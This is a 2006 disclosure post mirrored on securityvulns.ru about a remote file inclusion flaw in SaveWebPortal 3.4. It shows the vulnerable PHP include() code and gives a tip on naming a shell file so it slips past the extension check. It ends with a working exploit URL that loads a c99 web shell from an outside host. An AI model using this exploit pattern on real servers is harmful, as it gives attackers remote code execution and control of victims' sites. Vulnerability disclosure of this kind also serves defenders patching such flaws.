Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21430] hitweb "REP_INC" File Inclusion Vulnerability

  [SA21424] Ruby on Rails Unspecified Vulnerability

  [SA21435] Drupal Bibliography Module Cross-Site Scripting and SQL Injection

  [SA21438] MojoGallery "admin.
cgi" Cross-Site Scripting Vulnerabilities

From:x0rax <Master9976_(at)_hotmail.de>
Date:10.08.2006
Subject:SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability

--------------------------------------------
SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability
Download:http://www.circeos.it/frontend/theme4/index.php?page=downloads
--------------------------------------------
Found by x0rax
Master9976@hotmail.de
--------------------------------------------
Vulnerable Code:
<?php
....
if (strstr ($page, ".php") ||
                      strstr ($page, ".htm") ||
                      strstr ($page, ".html")) {
                      include ("$page");
....
?>
--------------------------------------------
to inject succesfully you have to create a file called shell.html.txt or
shell.php.txt
otherwise it wont work!
--------------------------------------------
Affected File:
index.php =]
--------------------------------------------
Vulnerability:
http://host.com/index.php?page=http://master-boy.cwsurf.de/c99.php.txt
--------------------------------------------

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server